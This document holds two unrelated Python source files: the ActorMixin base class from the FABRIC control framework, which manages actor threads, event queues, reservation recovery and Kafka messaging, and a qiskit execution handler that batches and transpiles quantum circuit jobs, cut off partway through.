from fabric_cf.actor.core.apis.abc_timer_task import ABCTimerTask
from fabric_cf.actor.core.apis.abc_actor_mixin import ABCActorMixin, ActorType
from fabric_cf.actor.core.apis.abc_actor_event import ABCActorEvent
from fabric_cf.actor.core.apis.abc_actor_proxy import ABCActorProxy
from fabric_cf.actor.core.apis.abc_actor_runnable import ABCActorRunnable
from fabric_cf.actor.core.apis.abc_query_response_handler import ABCQueryResponseHandler
from fabric_cf.actor.core.apis.abc_reservation_mixin import ABCReservationMixin
from fabric_cf.actor.core.apis.abc_slice import ABCSlice
from fabric_cf.actor.core.common.exceptions import ActorException
from fabric_cf.actor.core.container.message_service import MessageService
from fabric_cf.actor.core.kernel.failed_rpc import FailedRPC
from fabric_cf.actor.core.kernel.kernel_wrapper import KernelWrapper
from fabric_cf.actor.core.kernel.rpc_manager_singleton import RPCManagerSingleton
from fabric_cf.actor.core.kernel.resource_set import ResourceSet
from fabric_cf.actor.core.proxies.proxy import Proxy
from fabric_cf.actor.core.time.actor_clock import ActorClock
from fabric_cf.actor.core.time.term import Term
from fabric_cf.actor.core.util.id import ID
from fabric_cf.actor.core.util.iterable_queue import IterableQueue
from fabric_cf.actor.core.util.reflection_utils import ReflectionUtils
from fabric_cf.actor.core.util.reservation_set import ReservationSet
from fabric_cf.actor.security.auth_token import AuthToken
class ExecutionStatus:
"""
Execution status of an action on Actor Thread
"""
def __init__(self):
self.done = False
self.exception = None
self.result = None
self.lock = threading.Condition()
def mark_done(self):
"""
Mark as done
"""
self.done = True
class ActorEvent(ABCActorEvent):
"""
Actor Event
"""
def __init__(self, *, status: ExecutionStatus, runnable: ABCActorRunnable):
self.status = status
self.runnable = runnable
def process(self):
"""
Process an event
"""
try:
self.status.result = self.runnable.run()
except Exception as e:
traceback.print_exc()
self.status.exception = e
finally:
with self.status.lock:
self.status.done = True
self.status.lock.notify_all()
class ActorMixin(ABCActorMixin):
"""
Actor is the base class for all actor implementations
"""
DefaultDescription = "no description"
actor_count = 0
def __init__(self, *, auth: AuthToken = None, clock: ActorClock = None):
# Globally unique identifier for this actor.
self.guid = ID()
# Actor name.
self.name = None
# Actor type code.
self.type = ActorType.All
# Actor description.
self.description = self.DefaultDescription
# Identity object representing this actor.
self.identity = auth
# Actor policy object.
self.policy = None
# Actor plugin
self.plugin = None
# True if this actor has completed the recovery phase.
self.recovered = False
# The kernel wrapper.
self.wrapper = None
# logger
self.logger = None
# Factory for term.
self.clock = clock
# current cycle
self.current_cycle = -1
# True if the current tick is the first tick this actor has received.
self.first_tick = True
# Set to true when the actor is stopped.
self.stopped = False
# Initialization status.
self.initialized = False
# Contains a reference to the thread currently executing the timer handler.
# This field is set at the entry to and clear at the exit.
# The primary use of the field is to handle correctly stopping the actor.
self.thread = None
# A queue of timers that have fired and need to be processed.
self.timer_queue = queue.Queue()
self.event_queue = queue.Queue()
self.reservation_tracker = None
self.subscription_id = None
# Reservations to close once recovery is complete.
self.closing = ReservationSet()
self.thread_lock = threading.Lock()
self.actor_main_lock = threading.Condition()
self.message_service = None
def __getstate__(self):
state = self.__dict__.copy()
del state['recovered']
del state['wrapper']
del state['logger']
del state['clock']
del state['current_cycle']
del state['first_tick']
del state['stopped']
del state['initialized']
del state['thread_lock']
del state['thread']
del state['timer_queue']
del state['event_queue']
del state['reservation_tracker']
del state['subscription_id']
del state['actor_main_lock']
del state['closing']
del state['message_service']
return state
def __setstate__(self, state):
self.__dict__.update(state)
self.recovered = False
self.wrapper = None
self.logger = None
self.clock = None
self.current_cycle = -1
self.first_tick = True
self.stopped = False
self.initialized = False
self.thread = None
self.thread_lock = threading.Lock()
self.timer_queue = queue.Queue()
self.event_queue = queue.Queue()
self.subscription_id = None
self.actor_main_lock = threading.Condition()
self.closing = ReservationSet()
self.message_service = None
self.policy.set_actor(actor=self)
def actor_added(self):
self.plugin.actor_added()
def actor_removed(self):
return
def fail(self, *, rid: ID, message: str):
self.wrapper.fail(rid=rid, message=message)
def fail_delegation(self, *, did: str, message: str):
self.wrapper.fail_delegation(did=did, message=message)
def close_by_rid(self, *, rid: ID):
self.wrapper.close(rid=rid)
def close(self, *, reservation: ABCReservationMixin):
if reservation is not None:
if not self.recovered:
self.logger.debug("Adding reservation: {} to closing list".format(reservation.get_reservation_id()))
self.closing.add(reservation=reservation)
else:
self.logger.debug("Closing reservation: {}".format(reservation.get_reservation_id()))
self.wrapper.close(rid=reservation.get_reservation_id())
def close_slice_reservations(self, *, slice_id: ID):
self.wrapper.close_slice_reservations(slice_id=slice_id)
def close_reservations(self, *, reservations: ReservationSet):
for reservation in reservations.values():
try:
self.logger.debug("Closing reservation: {}".format(reservation.get_reservation_id()))
self.close(reservation=reservation)
except Exception as e:
self.logger.error(traceback.format_exc())
self.logger.error("Could not close for #{} {}".format(reservation.get_reservation_id(), e))
def error(self, *, err: str):
"""
Logs and propagates a general error.
@param err
log/exception message.
@throws Exception
always
"""
self.logger.error(err)
raise ActorException(err)
def extend(self, *, rid: ID, resources: ResourceSet, term: Term):
self.wrapper.extend_reservation(rid=rid, resources=resources, term=term)
def external_tick(self, *, cycle: int):
self.logger.info("External Tick start cycle: {}".format(cycle))
class TickEvent(ABCActorEvent):
def __init__(self, *, base, cycle: int):
self.base = base
self.cycle = cycle
def __str__(self):
return "{} {}".format(self.base, self.cycle)
def process(self):
self.base.actor_tick(cycle=self.cycle)
self.queue_event(incoming=TickEvent(base=self, cycle=cycle))
self.logger.info("External Tick end cycle: {}".format(cycle))
def actor_tick(self, *, cycle: int):
"""
Actor Tick
:param cycle: cycle
:return:
"""
try:
if not self.recovered:
self.logger.warning("Tick for an actor that has not completed recovery")
return
current_cycle = 0
if self.first_tick:
current_cycle = cycle
else:
current_cycle = self.current_cycle + 1
while current_cycle <= cycle:
self.logger.info("actor_tick: {} start".format(current_cycle))
self.current_cycle = current_cycle
self.policy.prepare(cycle=self.current_cycle)
if self.first_tick:
self.reset()
self.tick_handler()
self.policy.finish(cycle=self.current_cycle)
self.wrapper.tick()
self.first_tick = False
self.logger.info("actor_tick: {} end".format(current_cycle))
current_cycle += 1
except Exception as e:
self.logger.debug(traceback.format_exc())
raise e
def get_actor_clock(self) -> ActorClock:
return self.clock
def get_client_slices(self) -> List[ABCSlice]:
return self.wrapper.get_client_slices()
def get_current_cycle(self) -> int:
return self.current_cycle
def get_description(self) -> str:
return self.description
def get_guid(self) -> ID:
if self.identity is not None:
return self.identity.get_guid()
return None
def get_identity(self) -> AuthToken:
return self.identity
def get_inventory_slices(self) -> List[ABCSlice]:
"""
Get inventory slices
@return inventory slices
"""
return self.wrapper.get_inventory_slices()
def get_logger(self):
return self.logger
def get_name(self) -> str:
return self.name
def get_policy(self) -> ABCPolicy:
return self.policy
def get_delegation(self, *, did: str) -> ABCDelegation:
return self.wrapper.get_delegation(did=did)
def get_reservation(self, *, rid: ID) -> ABCReservationMixin:
return self.wrapper.get_reservation(rid=rid)
def get_reservations(self, *, slice_id: ID) -> List[ABCReservationMixin]:
return self.wrapper.get_reservations(slice_id=slice_id)
def get_plugin(self):
return self.plugin
def get_slice(self, *, slice_id: ID) -> ABCSlice:
return self.wrapper.get_slice(slice_id=slice_id)
def get_slices(self):
return self.wrapper.get_slices()
def get_type(self) -> ActorType:
return self.type
def initialize(self):
from fabric_cf.actor.core.container.globals import GlobalsSingleton
if not self.initialized:
if self.identity is None or self.plugin is None or self.policy is None:
raise ActorException(f"The actor is not properly created: identity: {self.identity} "
f"plugin: {self.plugin} policy: {self.policy}")
if self.name is None:
self.name = self.identity.get_name()
if self.name is None:
raise ActorException("The actor is not properly created: no name")
if self.clock is None:
self.clock = GlobalsSingleton.get().get_container().get_actor_clock()
if self.clock is None:
raise ActorException("The actor is not properly created: no clock")
if self.logger is None:
self.logger = GlobalsSingleton.get().get_logger()
self.plugin.set_actor(actor=self)
self.plugin.set_logger(logger=self.logger)
self.plugin.initialize()
self.policy.set_actor(actor=self)
self.policy.initialize()
self.policy.set_logger(logger=self.logger)
self.wrapper = KernelWrapper(actor=self, plugin=self.plugin, policy=self.policy)
self.current_cycle = -1
self.setup_message_service()
self.initialized = True
def is_recovered(self) -> bool:
return self.recovered
def is_stopped(self) -> bool:
return self.stopped
def query(self, *, query: dict = None, caller: AuthToken = None, actor_proxy: ABCActorProxy = None,
handler: ABCQueryResponseHandler = None, id_token: str = None) -> dict:
"""
Query an actor
@param query query
@param caller caller
@param actor_proxy actor proxy
@param handler response handler
@param id_token identity token
"""
if actor_proxy is None and handler is None:
return self.wrapper.query(properties=query, caller=caller, id_token=id_token)
else:
callback = Proxy.get_callback(actor=self, protocol=actor_proxy.get_type())
RPCManagerSingleton.get().query(actor=self, remote_actor=actor_proxy, callback=callback, query=query,
handler=handler, id_token=id_token)
return None
def recover(self):
"""
Recover
"""
self.logger.info("Starting recovery")
self.recovery_starting()
self.logger.debug("Recovering inventory slices")
inventory_slices = self.plugin.get_database().get_inventory_slices()
self.logger.debug("Found {} inventory slices".format(len(inventory_slices)))
self.recover_slices(slices=inventory_slices)
self.logger.debug("Recovery of inventory slices complete")
self.logger.debug("Recovering client slices")
client_slices = self.plugin.get_database().get_client_slices()
self.logger.debug("Found {} client slices".format(len(client_slices)))
self.recover_slices(slices=client_slices)
self.logger.debug("Recovery of client slices complete")
self.recovered = True
self.recovery_ended()
self.logger.info("Recovery complete")
def recovery_starting(self):
"""
Recovery starting
"""
self.plugin.recovery_starting()
self.policy.recovery_starting()
def recovery_ended(self):
"""
Recovery ended
"""
self.plugin.recovery_ended()
self.policy.recovery_ended()
def recover_slices(self, *, slices: List[ABCSlice]):
"""
Recover slices
@param slices slices
"""
for s in slices:
try:
self.recover_slice(slice_obj=s)
except Exception as e:
self.logger.error(traceback.format_exc())
self.logger.error("Error in recoverSlice for property list {}".format(e))
if s.is_inventory():
raise e
def recover_slice(self, *, slice_obj: ABCSlice):
"""
Recover slice
@param slice_obj slice_obj
"""
slice_id = slice_obj.get_slice_id()
if self.get_slice(slice_id=slice_id) is not None:
self.logger.debug("Found slice_id: {} slice:{}".format(slice_id, slice_obj))
else:
self.logger.info("Recovering slice: {}".format(slice_id))
self.logger.debug("Informing the plugin about the slice")
self.plugin.revisit(slice_obj=slice_obj)
self.logger.debug("Registering slice: {}".format(slice_id))
self.re_register_slice(slice_object=slice_obj)
self.logger.debug("Recovering reservations in slice: {}".format(slice_id))
self.recover_reservations(slice_obj=slice_obj)
self.logger.debug("Recovering delegations in slice: {}".format(slice_id))
self.recover_delegations(slice_obj=slice_obj)
self.logger.info("Recovery of slice {} complete".format(slice_id))
def recover_reservations(self, *, slice_obj: ABCSlice):
"""
Recover reservations
@param slice_obj slice object
"""
self.logger.info(
"Starting to recover reservations in slice {}({})".format(slice_obj.get_name(), slice_obj.get_slice_id()))
reservations = None
try:
reservations = self.plugin.get_database().get_reservations_by_slice_id(slice_id=slice_obj.get_slice_id())
except Exception as e:
self.logger.error(e)
raise ActorException(
"Could not fetch reservation records for slice {}({}) from database".format(slice_obj.get_name(),
slice_obj.get_slice_id()))
self.logger.debug("There are {} reservations(s) in slice".format(len(reservations)))
for r in reservations:
try:
self.recover_reservation(r=r, slice_obj=slice_obj)
except Exception as e:
self.logger.error("Unexpected error while recovering reservation {}".format(e))
self.logger.info("Recovery for reservations in slice {} completed".format(slice_obj))
def recover_reservation(self, *, r: ABCReservationMixin, slice_obj: ABCSlice):
"""
Recover reservation
@param r reservation
@param slice_obj slice object
"""
try:
r.restore(actor=self, slice_obj=slice_obj)
self.logger.info(
"Found reservation # {} in state {}".format(r.get_reservation_id(), r.get_reservation_state()))
if r.is_closed():
self.logger.info("Reservation #{} is closed. Nothing to recover.".format(r.get_reservation_id()))
return
self.logger.info("Recovering reservation #{}".format(r.get_reservation_id()))
self.logger.debug("Recovering reservation object r={}".format(r))
self.logger.debug("Registering the reservation with the actor")
self.re_register(reservation=r)
self.logger.info(r)
self.logger.debug("Revisiting with the Plugin")
self.plugin.revisit(reservation=r)
self.logger.info(r)
self.logger.debug("Revisiting with the actor policy")
self.policy.revisit(reservation=r)
self.logger.info("Recovered reservation #{}".format(r.get_reservation_id()))
except Exception as e:
self.logger.error(traceback.format_exc())
self.logger.error("Exception occurred in recovering reservation e={}".format(e))
raise ActorException("Could not recover Reservation #{}".format(r))
def recover_delegations(self, *, slice_obj: ABCSlice):
"""
Recover delegations for a slice
@param slice_obj slice object
"""
self.logger.info(
"Starting to recover delegations in slice {}({})".format(slice_obj.get_name(), slice_obj.get_slice_id()))
delegations = None
try:
delegations = self.plugin.get_database().get_delegations_by_slice_id(slice_id=slice_obj.get_slice_id())
except Exception as e:
self.logger.error(e)
raise ActorException(
"Could not fetch delegations records for slice {}({}) from database".format(slice_obj.get_name(),
slice_obj.get_slice_id()))
self.logger.debug("There are {} delegations(s) in slice".format(len(delegations)))
for d in delegations:
try:
self.logger.info("Delegation has properties: {}".format(d))
self.recover_delegation(d=d, slice_obj=slice_obj)
except Exception as e:
self.logger.error("Unexpected error while recovering delegation {}".format(e))
self.logger.info("Recovery for delegations in slice {} completed".format(slice_obj))
def recover_delegation(self, *, d: ABCDelegation, slice_obj: ABCSlice):
"""
Recover delegation
@param d delegation
@param slice_obj slice object
"""
try:
d.restore(actor=self, slice_obj=slice_obj)
self.logger.info(
"Found delegation # {} in state {}".format(d.get_delegation_id(), d.get_state_name()))
if d.is_closed():
self.logger.info("Delegation #{} is closed. Nothing to recover.".format(d.get_delegation_id()))
return
self.logger.info("Recovering delegation #{}".format(d.get_delegation_id()))
self.logger.debug("Recovering delegation object d={}".format(d))
self.logger.debug("Registering the delegation with the actor")
self.re_register_delegation(delegation=d)
self.logger.info(d)
self.logger.debug("Revisiting with the Plugin")
self.plugin.revisit(delegation=d)
self.logger.info(d)
self.logger.debug("Revisiting with the actor policy")
self.policy.revisit_delegation(delegation=d)
self.logger.info("Recovered delegation #{}".format(d.get_delegation_id()))
except Exception as e:
self.logger.error(traceback.format_exc())
self.logger.error("Exception occurred in recovering delegation e={}".format(e))
raise ActorException("Could not recover delegation #{}".format(d))
def register(self, *, reservation: ABCReservationMixin):
self.wrapper.register_reservation(reservation=reservation)
def register_slice(self, *, slice_object: ABCSlice):
self.wrapper.register_slice(slice_object=slice_object)
def register_delegation(self, *, delegation: ABCDelegation):
self.wrapper.register_delegation(delegation=delegation)
def remove_reservation(self, *, reservation: ABCReservationMixin = None, rid: ID = None):
if reservation is not None:
self.wrapper.remove_reservation(rid=reservation.get_reservation_id())
if rid is not None:
self.wrapper.remove_reservation(rid=rid)
def remove_slice(self, *, slice_object: ABCSlice):
self.wrapper.remove_slice(slice_id=slice_object.get_slice_id())
def remove_slice_by_slice_id(self, *, slice_id: ID):
self.wrapper.remove_slice(slice_id=slice_id)
def re_register_delegation(self, *, delegation: ABCDelegation):
self.wrapper.re_register_delegation(delegation=delegation)
def re_register(self, *, reservation: ABCReservationMixin):
self.wrapper.re_register_reservation(reservation=reservation)
def re_register_slice(self, *, slice_object: ABCSlice):
self.wrapper.re_register_slice(slice_object=slice_object)
def issue_delayed(self):
"""
Issues delayed operations
"""
assert self.recovered
self.close_reservations(reservations=self.closing)
self.closing.clear()
def reset(self):
"""
Reset an actor
"""
self.issue_delayed()
self.policy.reset()
def set_actor_clock(self, *, clock):
"""
Set actor clock
@param clock clock
"""
self.clock = clock
def set_description(self, *, description: str):
"""
Set description
@param description description
"""
self.description = description
def set_identity(self, *, token: AuthToken):
"""
Set identity
@param token token
"""
self.identity = token
self.name = self.identity.get_name()
self.guid = token.get_guid()
def set_policy(self, *, policy):
"""
Set policy
@param policy policy
"""
self.policy = policy
def set_recovered(self, *, value: bool):
"""
Set recovered flag
@param value value
"""
self.recovered = value
def set_plugin(self, *, plugin):
"""
Set plugin
@param plugin
"""
self.plugin = plugin
def set_stopped(self, *, value: bool):
"""
Set stopped flag
@param value value
"""
self.stopped = value
def is_on_actor_thread(self) -> bool:
"""
Check if running on actor thread
@return true if running on actor thread, false otherwise
"""
result = False
try:
self.thread_lock.acquire()
result = self.thread == threading.current_thread()
finally:
self.thread_lock.release()
return result
def execute_on_actor_thread_and_wait(self, *, runnable: ABCActorRunnable):
"""
Execute an incoming action on actor thread
@param runnable incoming action/operation
"""
if self.is_on_actor_thread():
return runnable.run()
else:
status = ExecutionStatus()
event = ActorEvent(status=status, runnable=runnable)
self.queue_event(incoming=event)
with status.lock:
while not status.done:
status.lock.wait()
if status.exception is not None:
raise status.exception
return status.result
def run(self):
"""
Actor run function for actor thread
"""
try:
self.logger.info("Actor Main Thread started")
self.actor_count -= 1
self.actor_main()
except Exception as e:
self.logger.error(f"Unexpected error {e}")
self.logger.error(traceback.format_exc())
finally:
self.logger.info("Actor Main Thread exited")
def start(self):
"""
Start an Actor
"""
try:
self.thread_lock.acquire()
if self.thread is not None:
raise ActorException("This actor has already been started")
self.thread = threading.Thread(target=self.run)
self.thread.setName(self.get_name())
self.thread.setDaemon(True)
self.thread.start()
finally:
self.thread_lock.release()
self.message_service.start()
if self.plugin.get_handler_processor() is not None:
self.plugin.get_handler_processor().start()
def stop(self):
"""
Stop an actor
"""
self.stopped = True
self.message_service.stop()
try:
self.thread_lock.acquire()
temp = self.thread
self.thread = None
if temp is not None:
self.logger.warning("It seems that the actor thread is running. Interrupting it")
try:
# TODO find equivalent of interrupt
with self.actor_main_lock:
self.actor_main_lock.notify_all()
temp.join()
except Exception as e:
self.logger.error("Could not join actor thread {}".format(e))
self.logger.error(traceback.format_exc())
finally:
self.thread_lock.release()
finally:
if self.thread_lock is not None and self.thread_lock.locked():
self.thread_lock.release()
if self.plugin.get_handler_processor() is not None:
self.plugin.get_handler_processor().shutdown()
def tick_handler(self):
"""
Tick handler
"""
def handle_failed_rpc(self, *, rid: ID, rpc: FailedRPC):
"""
Handler failed rpc
"""
self.wrapper.process_failed_rpc(rid=rid, rpc=rpc)
def __str__(self):
return "actor: [{}/{}]".format(self.name, self.guid)
def unregister(self, *, reservation: ABCReservationMixin, rid: ID):
"""
Unregister reservation
@param reservation reservation
@param rid reservation id
"""
if reservation is not None:
self.wrapper.unregister_reservation(rid=reservation.get_reservation_id())
if rid is not None:
self.wrapper.unregister_reservation(rid=rid)
def unregister_slice(self, *, slice_object: ABCSlice):
"""
Unregister slice
@param slice_obj slice object
"""
self.wrapper.unregister_slice(slice_id=slice_object.get_slice_id())
def unregister_slice_by_slice_id(self, *, slice_id: ID):
"""
Unregister slice by slice id
@param slice_id slice id
"""
self.wrapper.unregister_slice(slice_id=slice_id)
def queue_timer(self, timer: ABCTimerTask):
"""
Queue an event on Actor timer queue
"""
with self.actor_main_lock:
self.timer_queue.put_nowait(timer)
self.logger.debug("Added timer to timer queue {}".format(timer.__class__.__name__))
self.actor_main_lock.notify_all()
def queue_event(self, *, incoming: ABCActorEvent):
"""
Queue an even on Actor Event Queue
"""
with self.actor_main_lock:
self.event_queue.put_nowait(incoming)
self.logger.debug("Added event to event queue {}".format(incoming.__class__.__name__))
self.actor_main_lock.notify_all()
def await_no_pending_reservations(self):
"""
Await until no pending reservations
"""
self.wrapper.await_nothing_pending()
def actor_main(self):
"""
Actor Main loop
"""
while True:
events = []
timers = []
with self.actor_main_lock:
while self.event_queue.empty() and self.timer_queue.empty() and not self.stopped:
try:
self.actor_main_lock.wait()
except InterruptedError as e:
self.logger.info("Actor thread interrupted. Exiting")
return
if self.stopped:
self.logger.info("Actor exiting")
return
if not self.event_queue.empty():
try:
for event in IterableQueue(source_queue=self.event_queue):
events.append(event)
except Exception as e:
self.logger.error(f"Error while adding event to event queue! e: {e}")
self.logger.error(traceback.format_exc())
if not self.timer_queue.empty():
try:
for timer in IterableQueue(source_queue=self.timer_queue):
timers.append(timer)
except Exception as e:
self.logger.error(f"Error while adding event to event queue! e: {e}")
self.logger.error(traceback.format_exc())
self.actor_main_lock.notify_all()
if len(events) > 0:
self.logger.debug(f"Processing {len(events)} events")
for event in events:
#self.logger.debug("Processing event of type {}".format(type(e)))
#self.logger.debug("Processing event {}".format(e))
try:
event.process()
except Exception as e:
self.logger.error(f"Error while processing event {type(event)}, {e}")
self.logger.error(traceback.format_exc())
if len(timers) > 0:
self.logger.debug(f"Processing {len(timers)} timers")
for t in timers:
try:
t.execute()
except Exception as e:
self.logger.error(f"Error while processing a timer {type(t)}, {e}")
self.logger.error(traceback.format_exc())
def setup_message_service(self):
"""
Set up Message Service for incoming Kafka Messages
"""
try:
# Kafka Proxy Service object
module_name = self.get_kafka_service_module()
class_name = self.get_kafka_service_class()
kafka_service = ReflectionUtils.create_instance_with_params(module_name=module_name,
class_name=class_name)(actor=self)
# Kafka Management Service object
module_name = self.get_mgmt_kafka_service_module()
class_name = self.get_mgmt_kafka_service_class()
kafka_mgmt_service = ReflectionUtils.create_instance_with_params(module_name=module_name,
class_name=class_name)()
kafka_mgmt_service.set_logger(logger=self.logger)
# Incoming Message Service
from fabric_cf.actor.core.container.globals import GlobalsSingleton
config = GlobalsSingleton.get().get_config()
topic = config.get_actor().get_kafka_topic()
topics = [topic]
consumer_conf = GlobalsSingleton.get().get_kafka_config_consumer()
self.message_service = MessageService(kafka_service=kafka_service, kafka_mgmt_service=kafka_mgmt_service,
consumer_conf=consumer_conf,
key_schema_location=GlobalsSingleton.get().get_config().get_kafka_key_schema_location(),
value_schema_location=GlobalsSingleton.get().get_config().get_kafka_value_schema_location(),
topics=topics, logger=self.logger)
except Exception as e:
self.logger.error(traceback.format_exc())
self.logger.error("Failed to setup message service e={}".format(e))
raise e
def set_logger(self, logger):
self.logger = logger
if self.policy is not None:
self.policy.set_logger(logger=logger)
if self.plugin is not None:
self.plugin.set_logger(logger=logger)
def load_model(self, *, graph_id: str):
return
|
execution_handler.py
|
import copy
import math
import time
from collections import Counter
from concurrent.futures.process import BrokenProcessPool
from queue import Empty, Queue
from threading import Lock, Thread
from typing import Dict, List, Union
import logger
import psutil
import qiskit.providers.ibmq.job.exceptions
import qiskit.tools.parallel
from qiskit import QuantumCircuit, assemble, transpile
from qiskit.providers import Backend
from qiskit.providers.ibmq.accountprovider import AccountProvider
from qiskit.providers.job import Job
from qiskit.providers.provider import Provider
from qiskit.qobj import Qobj
from qiskit.result.models import ExperimentResultData
from qiskit.result.result import Result
from quantum_execution_job import QuantumExecutionJob
def new_parallel_map(task, values, task_args=tuple(), task_kwargs={}, num_processes=qiskit.tools.parallel.CPU_COUNT):
if num_processes == psutil.cpu_count(logical=True) and num_processes > 1:
# at least one free logical core
num_processes -= 1
print(f"num_processes={num_processes}")
return qiskit.tools.parallel.parallel_map(task, values, task_args, task_kwargs, num_processes)
# overwrite the parallel_map function to enable the usage of more CPU cores
transpile.__globals__["parallel_map"] = new_parallel_map
class BackendLookUp():
"""Look up information about the remote backends
"""
def __init__(self, provider:Provider) -> None:
self._log = logger.get_logger(type(self).__name__)
self._provider = provider
self._backends = {}
def get(self, backend_name:str, exclusiv=False) -> Backend:
"""Get the corresponding backend
Args:
backend_name (str)
exclusiv (bool, optional): If true, return a new exlusive object. Defaults to False.
Returns:
Backend: representing the remote QPU
"""
if exclusiv:
return self._provider.get_backend(backend_name)
try:
backend = self._backends[backend_name]
except KeyError:
backend = self._provider.get_backend(backend_name)
self._log.info(f"Retrieved backend {backend_name}")
self._backends[backend_name] = backend
return backend
def max_shots(self, backend_name:str) -> int:
backend = self.get(backend_name)
return backend.configuration().max_shots
def max_experiments(self, backend_name:str) -> int:
backend = self.get(backend_name)
return backend.configuration().max_experiments
class BackendControl():
"""Control the access to the backends to regulate the number of queued jobs"""
def __init__(self,):
self._log = logger.get_logger(type(self).__name__)
self._locks = {}
self._counters = {}
def try_to_enter(self, backend_name:str, backend:Backend) -> bool:
"""Try to enter the lock of the backend
Args:
backend_name (str)
backend (Backend)
Returns:
bool: True, if successfully entered the lock. False, otherwise
"""
try:
lock = self._locks[backend_name]
counter = self._counters[backend_name]
except KeyError:
lock = Lock()
counter = 0
self._locks[backend_name] = lock
self._counters[backend_name] = counter
with lock:
limit = backend.job_limit()
self._log.debug(f"Backend: {backend_name} Counter:{counter} Active_Jobs:{limit.active_jobs} Maximum_jobs:{limit.maximum_jobs}")
if limit.active_jobs < limit.maximum_jobs:
if counter < limit.maximum_jobs:
self._counters[backend_name] += 1
return True
return False
def leave(self, backend_name:str):
"""Leave the lock of the backend
Args:
backend_name (str)
"""
with self._locks[backend_name]:
self._counters[backend_name] -= 1
class Transpiler():
def __init__(self, input:Queue, output:Queue, backend_look_up:BackendLookUp, timeout:int, max_transpile_batch_size:Union[float, int]=float('inf')) -> None:
self._log = logger.get_logger(type(self).__name__)
self._input = input
self._output = output
self._backend_look_up = backend_look_up
self._timeout = timeout
self._max_transpile_batch_size = max_transpile_batch_size
self._jobs_to_transpile = {}
self._timers = {}
self._pending_transpilation = {}
self._pending = Queue()
self._finished = Queue()
self._log.info("Init")
def start(self):
Thread(target=self._route_job).start()
Thread(target=self._transpile).start()
self._log.info("Started")
def _transpile(self):
"""Function that transpiles the pending transpilation Batches
Raises:
e: BrokenProcessPool
"""
while True:
backend_name, jobs = self._pending.get()
backend = self._backend_look_up.get(backend_name)
circuits = list([job.circuit for job in jobs])
self._log.debug(f"Start transpilation of {len(circuits)} circuits for backend {backend.name()}")
trans_start_time = time.time()
tries = 3
for i in range(tries):
try:
transpiled_circuits = transpile(circuits, backend=backend)
break
except BrokenProcessPool as e:
if hasattr(e, 'message'):
self._log.info(f"In try {i} the following error occured {e.message}")
else:
self._log.exception(e)
if i == tries-1:
raise e
time_diff = time.time() - trans_start_time
self._log.info(f"Transpiled {len(transpiled_circuits)} circuits for backend {backend.name()} in {time_diff}s")
self._finished.put((backend_name, zip(transpiled_circuits, jobs)))
def _create_transpilation_batch(self, backend_name:str) -> bool:
"""Creates a batch for the transpilation for the given backend, if there is not already a pending transpilation for the backend
Args:
backend_name (str)
Returns:
bool: True, if a batch was created
"""
try:
if self._pending_transpilation[backend_name]:
return False
except KeyError:
pass
n_jobs = min([len(self._jobs_to_transpile[backend_name]), self._backend_look_up.max_experiments(backend_name), self._max_transpile_batch_size])
self._log.debug(f"Prepared {n_jobs} circuits for the transpilation for backend {backend_name}")
jobs = self._jobs_to_transpile[backend_name][:n_jobs]
self._jobs_to_transpile[backend_name] = self._jobs_to_transpile[backend_name][n_jobs:]
self._pending.put((backend_name, jobs))
self._pending_transpilation[backend_name] = True
if len(self._jobs_to_transpile[backend_name]) > 0:
self._timers[backend_name] = time.time()
return True
def _add_job(self, job:QuantumExecutionJob):
"""Add an incoming job to the internal data structure in order to transpile it for the given backend.
Checks if there are enough jobs to create a full transpilation batch.
Args:
job (QuantumExecutionJob): job to transpile
"""
backend_name = job.backend_data.name
try:
self._jobs_to_transpile[backend_name].append(job)
except KeyError:
self._jobs_to_transpile[backend_name] = [job]
if not backend_name in self._timers.keys():
self._timers[backend_name] = time.time()
if len(self._jobs_to_transpile[backend_name]) == self._backend_look_up.max_experiments(backend_name):
# Todo try to cancel
if self._create_transpilation_batch(backend_name):
self._timers.pop(backend_name)
def _check_timers(self):
"""Check the timers. If an timeout occurs, try to create a transpilation batch.
"""
timers_to_clear = []
for backend_name in self._timers.keys():
time_diff = time.time() - self._timers[backend_name]
if time_diff > self._timeout:
if self._create_transpilation_batch(backend_name):
self._log.debug(f"Transpilation timeout for backend {backend_name}: {time_diff}s")
timers_to_clear.append(backend_name)
for backend_name in timers_to_clear:
self._timers.pop(backend_name)
if len(self._jobs_to_transpile[backend_name]) > 0:
# start a new timer
self._timers[backend_name] = time.time()
def _any_pending_transpilation(self) -> bool:
"""
Returns:
bool: True if there are any pending transpilation batches
"""
if len(self._pending_transpilation) == 0:
return False
else:
return any(self._pending_transpilation.values())
def _route_job(self):
"""Function that processes incoming jobs, periodically chechs the timers, and forwards transpiled jobs to the output
"""
while True:
for i in range(1000):
try:
timeout = 0.1
if i == 0:
timeout = 1
# only block in the first iteration
job = self._input.get(timeout=timeout)
self._add_job(job)
except Empty:
break
if not self._any_pending_transpilation():
self._check_timers()
try:
backend_name, transpiled_result = self._finished.get(block=False)
self._pending_transpilation[backend_name] = False
for transpiled_tuple in transpiled_result:
self._output.put(transpiled_tuple)
self._check_timers()
except Empty:
pass
class Batch():
'''A batch represents a job on a backend. It can contain multiple experiments.'''
def __init__(self, backen_name:str, max_shots: int, max_experiments: int, batch_number:int):
self._log = logger.get_logger(type(self).__name__)
self.backend_name = backen_name
self.max_shots = max_shots
self.shots = 0
self.max_experiments = max_experiments
self.experiments = []
self.remaining_experiments = max_experiments
self.n_circuits = 0
self.batch_number = batch_number
def add_circuit(self, key, circuit:QuantumCircuit, shots:int) -> int:
"""Add a circuit to the Batch.
Args:
key (Any): Identifier for the circuit
circuit (QuantumCircuit): The circuit, which should be executed
shots (int): The number of shots
Returns:
int: remaining shots. If they are 0, all shots are executed
"""
if self.remaining_experiments == 0:
return shots
self.n_circuits += 1
reps = math.ceil(shots/self.max_shots)
self.shots = max(self.shots, min(shots, self.max_shots))
if reps <= self.remaining_experiments:
remaining_shots = 0
else:
reps = self.remaining_experiments
remaining_shots = shots - reps*self.max_shots
self.remaining_experiments -= reps
self.experiments.append({"key":key, "circuit":circuit, "reps":reps, "shots":shots-remaining_shots, "total_shots":shots})
return remaining_shots
class Batcher(Thread):
def __init__(self, input:Queue, output: Queue, quantum_job_table:Dict, backend_look_up:BackendLookUp, batch_timeout:int=30) -> None:
self._log = logger.get_logger(type(self).__name__)
self._input = input
self._output = output
self._batch_timeout = batch_timeout
self._quantum_job_table = quantum_job_table
self._backend_look_up = backend_look_up
self._batch_timers = {}
self._batch_count = {}
self._batches = {}
Thread.__init__(self)
self._log.info("Init")
def _get_or_create_batch(self, backend_name:str):
try:
batch = self._batches[backend_name]
if batch.remaining_experiments == 0:
